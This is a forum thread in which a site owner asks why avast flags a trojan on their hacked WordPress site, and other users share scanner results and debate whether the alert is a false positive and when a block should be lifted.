I have a website wxw.msolarpro.com. When I go to the site I get avast! Web Shield blocked trojan horse message. I Google’d the trojan and didn’t find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?
I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results. As presumably the example of the actual script, document . write gives the web shield a fit.
I said what I believe happened, sucuri displays the code extracted from the suspect site and the web shield detects it in the same way it would on the original site.
This happens when you are using some analysis sites that give more information on what is found is a copy of what is on the site. I have a number of exclusions for some analysis sites.
It is just that in the past sucuri didn’t display the page link to the results so we had to post an image of the information. Now that it does those visiting the results page could well get a shock.
The norman attitude is strange to me as the site in itself has been hacked (wordpress files, don’t know if it is an old vulnerable version being exploited). Regardless if the remote source is up at the time it is checked, as there is nothing to stop the remote site becoming active.
Well this is flagged as supicious by avast as JS:ScriptDC-inf[Trj] for the jsunpack analysis
of mentioned site:
-www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) (script) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
status: (referer=-www.msolarpro.com/)saved 386 bytes 8312b9b0c984c54fbc8feaf66bcb4b1dd3acaf58
info: [decodingLevel=0] found JavaScript
Avast webshield flags -www.msolarpro.com/wp-includes/js/l10n.js?ver=20101110
But to Pondus, also have a look here for a second op: http://forum.avast.com/index.php?action=printpage;topic=83287.0 where a false positive was found…and the IP also had an instance of HTML/Redirector.MA on it (now dead),
Also consider this VT scan: https://www.virustotal.com/url/b417c30323119157b1261a38567c6b62c55941dd22dade7bc984be07d0f1068e/analysis/1327015879/ (detection from Bitdefender, but TrafficLight does not list it)
We can conclude that the dents of the avast web shield really dig that deep, my good forum friends, as I have explained and demonstrated above in my explanation of the website scan analysis, Yes, I repeat this again - the avast webshield, notwithstanding the status of the exploit found, is an awesome and formidable protection tool,
I think the avast point of vieuw is the right one here. As long as the website code stays exploitable, software is not fully patched, reinfection stays an imminent threat.
As long as the webclient can no longer be infected, we could conclude the block could be lifted.
So norman says malcode no longer up or responding, site safe to be visited by user.
This attitude towards the issue is rounding the bends by a mile, so to say.
Better is to lift website blocking when the website is secure for both user and website owner/ website hoster/ webmaster. The software code has been fully patched, exploit code cleansed, all measures have been taken to prevent re-infection. One such an action which could be that easy as no longer giving away the full server software version, etc.
I thank you all for the help you have provided. I read the replies, however I did not understand all of what was discussed. Does ‘/sitecheck.sucuri.net/results/’ clean the infected code or just inform to the infection?
Where does my wesite stand at this time-as far as avast program is concerned?
I do not get an avast alert now. This still could be patched: -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
status: (referer=-www.google.com/trends/hottrends)saved 16949 bytes 91588590e403cf96232b117e04289bbc21b898be
info: [script] -www.msolarpro.com/wp-includes/js/jquery/jquery.js?ver=1.7.1
info: [script] -www.msolarpro.com/wp-content/plugins/brainhost-plugin/script.js?ver=1.0
info: [script] -www.brainhost.com/ads/ad.js?size=300x250
info: [script] -www.brainhost.com/ads/ad.js?size=120x600
info: [script] -www.msolarpro.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20111117
info: [decodingLevel=0] found JavaScript
suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
info
No particulars now here: http://wepawet.iseclab.org/view.php?hash=fc212bf7576cae45a08415e6b278b2e8&t=1327169129&type=js
In its results it is only showing what it considers infected/suspect it won’t clean it as that in itself would be hacking if someone could ask it to check the site out and that resulted in changes unknown to the owner.
Any cleaning is down to the site owner, it does however offer service plans to clean up sites, I have never used any of their services though. The one site clean-up premium service plan does seem reasonably good value though http://sucuri.net/signup.
I don’t get an alert visiting your site using firefox 9.0.1.
So it would appear that something has been updated/cleaned up in regard of the wordpress files as sucuri no longer flags it as infected, see image.